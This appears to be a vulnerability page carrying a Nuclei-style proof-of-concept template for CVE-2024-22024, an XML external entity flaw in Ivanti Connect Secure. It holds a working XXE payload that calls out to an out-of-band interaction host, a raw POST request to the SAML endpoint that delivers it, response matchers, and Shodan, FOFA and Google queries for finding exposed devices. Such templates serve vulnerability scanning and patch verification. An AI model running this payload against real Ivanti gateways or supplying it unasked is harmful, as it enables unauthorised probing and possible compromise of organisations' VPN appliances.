漏洞描述
Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.
CVE-2024-22024: Ivanti Connect Secure - XXE
PoC代码[已公开]
id: CVE-2024-22024
info:
name: Ivanti Connect Secure - XXE
author: watchTowr
severity: high
description: |
Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution.
remediation: |
Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability.
reference:
- https://labs.watchtowr.com/are-we-now-part-of-ivanti/
- https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1
classification:
epss-score: 0.9431
epss-percentile: 0.99941
metadata:
max-request: 1
vendor: ivanti
product: connect_secure
shodan-query:
- "html:\"welcome.cgi?p=logo\""
- http.title:"ivanti connect secure"
- http.html:"welcome.cgi?p=logo"
fofa-query:
- body="welcome.cgi?p=logo"
- title="ivanti connect secure"
google-query: intitle:"ivanti connect secure"
tags: cve,cve2024,xxe,ivanti,vkev
variables:
payload: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM
"http://{{interactsh-url}}/x"> %watchTowr;]><r></r>'
http:
- raw:
- |
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
SAMLRequest={{base64(payload)}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
part: body
words:
- '/dana-na/'
- 'WriteCSS'
condition: and
# digest: 4a0a0047304502210093f03c369e144d1f8d4c19e74858068e36a24ef1e7349b02ec89ca95dae44d0302205938dea145f64c9efc45eb20ca2194ea93533d8146f0fa446a13e15f9d2a6be4:922c64590222798bb761d5b6d8e72950